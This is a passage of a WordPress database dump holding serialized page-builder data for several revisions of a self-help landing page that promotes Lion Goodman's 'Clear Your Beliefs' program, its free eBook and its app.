Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1092, 1582, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:725:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about</strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate the Beliefs that\nBlock Your Abundance,\nInterfere with Your Relationships,\nand Prevent You from Living the Life You Want</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1379:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Finally release pain and hurts from the past</li>\n	<li>Clear resistance that stops you from taking action</li>\n	<li>Open yourself to new possibilities of love, work and success</li>\n	<li>Eliminate the blocks that prevent you from getting what you want</li>\n	<li>Find your true purpose and express your true magnificence</li>\n	<li>Permanently delete whatever’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1096, 1586, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1244:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>Benefits of the <em>Clear Your Beliefs</em> Program</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Finally release pain and hurts from the past</li>\n        <li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">	\n        <li>Clear what stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1094, 1584, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:706:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, and\nStop You from Living a Great Life</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1379:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>What You Can Accomplish with <em>Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Finally release pain and hurts from the past</li>\n	<li>Clear resistance that stops you from taking action</li>\n	<li>Open yourself to new possibilities of love, work and success</li>\n	<li>Eliminate the blocks that prevent you from getting what you want</li>\n	<li>Find your true purpose and express your true magnificence</li>\n	<li>Permanently delete whatever’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works</b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:476:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 